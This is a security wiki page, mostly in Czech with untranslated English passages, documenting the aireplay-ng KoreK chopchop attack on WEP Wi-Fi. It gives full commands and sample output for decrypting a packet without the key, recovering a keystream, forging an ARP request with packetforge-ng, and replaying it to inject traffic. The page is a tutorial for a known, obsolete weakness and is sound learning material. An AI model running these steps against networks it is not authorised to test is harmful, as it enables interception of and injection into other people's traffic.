KoreK chopchop

Z ICT security wiki | airdump.cz
Přejít na: navigace, hledání

Obsah

KoreK chopchop

Tento útok, pokud je úspěšný, dokáže dešifrovat WEP data pakety bez znalostí klíče. Funguje i proti dynamickému WEP. //Tato část útoku neukáže WEP klíč, ale odkryje plaintex//. Nicméně, nekteré access pointy nejsou tímto útokem napadnutelné. Spočátku se může zdát, že ano, pak ale začnou zahazovat data pakety kratší než 60 bajtu. Když access point zahadzuje pakety kratší než 42 bajtu, aireplay se pokusí uhodnout zbytek chybějicích dat, do míry do jaké to je z hlavičky předvídatelné. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet.

Pokud máš zájem o podrobnosti o pozadí techniky viz. Chopchop Teorie.


Použití

  aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Kde:

  • -4 znamená chopchop attack
  • -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client or your card's MAC if you did fake authentication
  • -b 00:14:6C:7E:40:80 is the access point MAC address
  • ath0 is the wireless interface name

Although it is not shown, you may use any of the other aireplay-ng filters. The main page of aireplay-ng has the complete list. Additional typical filters could be the -m and -n to set the minimum and maximum packet sizes to select.

Příklad s jednoduchým výstupem

  aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0

Kde:

  • -4 znamená chopchop attack
  • -h 00:09:5B:EC:EE:F2 je MAC adresa naší karty a musí obsahovat MAC použitou ve fake authentication
  • -b 00:14:6C:7E:40:80 je MAC access pointu
  • ath0 je jméno použitého wireless rozhraní

Systémová odezva:

       Read 165 packets...
 
          Size: 86, FromDS: 1, ToDS: 0 (WEP)
  
          BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
          Source MAC  =  00:40:F4:77:E5:C9
  
          0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
          0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._.."
          0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
          0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
          0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>.q.r.e.i.
          0x0050:  cfeb 4a72 be46                           ..Jr.F
 
  Use this packet ? y

You respond "y" above and the system continues.

  Saving chosen packet in replay_src-0201-191639.cap
  
  Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms
  Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms
  Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms
  Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms
  Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms
  Offset   80 ( 9% done) | xor = CF | pt = 00 |  152 frames written in   456ms
  Offset   79 (11% done) | xor = 05 | pt = 00 |   29 frames written in    87ms
  Offset   78 (13% done) | xor = 69 | pt = 00 |  151 frames written in   454ms
  Offset   77 (15% done) | xor = CA | pt = 00 |   24 frames written in    71ms
  Offset   76 (17% done) | xor = 65 | pt = 00 |  129 frames written in   387ms
  Offset   75 (19% done) | xor = 9E | pt = 00 |   36 frames written in   108ms
  Offset   74 (21% done) | xor = 72 | pt = 00 |   39 frames written in   117ms
  Offset   73 (23% done) | xor = 01 | pt = 00 |  146 frames written in   438ms
  Offset   72 (25% done) | xor = 71 | pt = 00 |   83 frames written in   249ms
  Offset   71 (26% done) | xor = A1 | pt = 00 |   43 frames written in   129ms
  Offset   70 (28% done) | xor = 3E | pt = 00 |   98 frames written in   294ms
  Offset   69 (30% done) | xor = BB | pt = 00 |  129 frames written in   387ms
  Offset   68 (32% done) | xor = AE | pt = 00 |  248 frames written in   744ms
  Offset   67 (34% done) | xor = FB | pt = 00 |  105 frames written in   315ms
  Offset   66 (36% done) | xor = 43 | pt = 00 |  101 frames written in   303ms
  Offset   65 (38% done) | xor = D4 | pt = 00 |  158 frames written in   474ms
  Offset   64 (40% done) | xor = 16 | pt = 00 |  197 frames written in   591ms
  Offset   63 (42% done) | xor = 7F | pt = 0C |   72 frames written in   217ms
  Offset   62 (44% done) | xor = 1F | pt = 37 |  166 frames written in   497ms
  Offset   61 (46% done) | xor = 5C | pt = A8 |  119 frames written in   357ms
  Offset   60 (48% done) | xor = 9B | pt = C0 |  229 frames written in   687ms
  Offset   59 (50% done) | xor = 91 | pt = 00 |  113 frames written in   339ms
  Offset   58 (51% done) | xor = 25 | pt = 00 |  184 frames written in   552ms
  Offset   57 (53% done) | xor = 94 | pt = 00 |   33 frames written in    99ms
  Offset   56 (55% done) | xor = F3 | pt = 00 |  193 frames written in   579ms
  Offset   55 (57% done) | xor = D6 | pt = 00 |   17 frames written in    51ms
  Offset   54 (59% done) | xor = FA | pt = 00 |   81 frames written in   243ms
  Offset   53 (61% done) | xor = EA | pt = 01 |   95 frames written in   285ms
  Offset   52 (63% done) | xor = 5D | pt = 37 |   24 frames written in    72ms
  Offset   51 (65% done) | xor = 33 | pt = A8 |   20 frames written in    59ms
  Offset   50 (67% done) | xor = CC | pt = C0 |   97 frames written in   291ms
  Offset   49 (69% done) | xor = 03 | pt = C9 |  188 frames written in   566ms
  Offset   48 (71% done) | xor = 34 | pt = E5 |   48 frames written in   142ms
  Offset   47 (73% done) | xor = 34 | pt = 77 |   64 frames written in   192ms
  Offset   46 (75% done) | xor = 51 | pt = F4 |  253 frames written in   759ms
  Offset   45 (76% done) | xor = 98 | pt = 40 |  109 frames written in   327ms
  Offset   44 (78% done) | xor = 3D | pt = 00 |  242 frames written in   726ms
  Offset   43 (80% done) | xor = 5E | pt = 01 |  194 frames written in   583ms
  Offset   42 (82% done) | xor = AF | pt = 00 |   99 frames written in   296ms
  Offset   41 (84% done) | xor = C4 | pt = 04 |  164 frames written in   492ms
  Offset   40 (86% done) | xor = CE | pt = 06 |   69 frames written in   207ms
  Offset   39 (88% done) | xor = 9D | pt = 00 |  137 frames written in   411ms
  Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms
  Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms
  Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms
  Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms
  Sent 957 packets, current guess: B9...
  
  The AP appears to drop packets shorter than 35 bytes.
  Enabling standard workaround: ARP header re-creation.
  
  Saving plaintext in replay_dec-0201-191706.cap
  Saving keystream in replay_dec-0201-191706.xor
  
  Completed in 21s (2.29 bytes/s)

Success! The file "replay_dec-0201-191706.xor" above can then be used in the next step to generate a packet with packetforge-ng such as an arp packet. You may also use tcpdump or Wireshark to view the decrypted packet which is stored in replay_dec-0201-191706.cap.

Generování ARP paketu

1. First, we decrypt one packet

     aireplay-ng -4 ath0

If this isn't successful, in most cases the access point just drops the data because it does not know the MAC which is sending it. In this case we have to use the MAC adress of a connected client which is allowed to send data over the network:

     aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Let's have a look at the IP address

     tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
     reading from file replay_dec-0627-022301.cap, link-type [...]
     IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.

packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. And replay our forged ARP request

     aireplay-ng -2 -r arp.cap ath0

Uživatelské Tipy

When to say no to a packet? You may ask if there are times when you should say "no" to selecting a specific packet. Here are some examples of when you might say no:

  • The packet length was too short and you wanted/needed PRGA longer then the packet length.
  • You were looking to decrypt a packet to/from a specific client and you would wait for a packet to/from that client MAC address.
  • You may want to purposely pick a short packet. The reason being that the decryption time is linear to the length of the packet. IE Small packets take less time.


Řešení problému

Podívej se také na hlavní nápovědu pro aireplay-ng řešení problémů.

Although not a direct troubleshooting tip for the chopchop attack, if you are unable to get the attack to work, there are some alternate attacks you should consider:

  • Fragmentation Attack: This is an alternate technique to obtain PRGA for building packets for subsequent injection.
  • -p 0841 metoda: Technika umožňuje reinject libovolného data paketu zachyceného z access pointu a generování IVs.
Osobní nástroje
Jmenné prostory

Varianty
Akce
Portál AMP
WiKi Navigace
Nástroje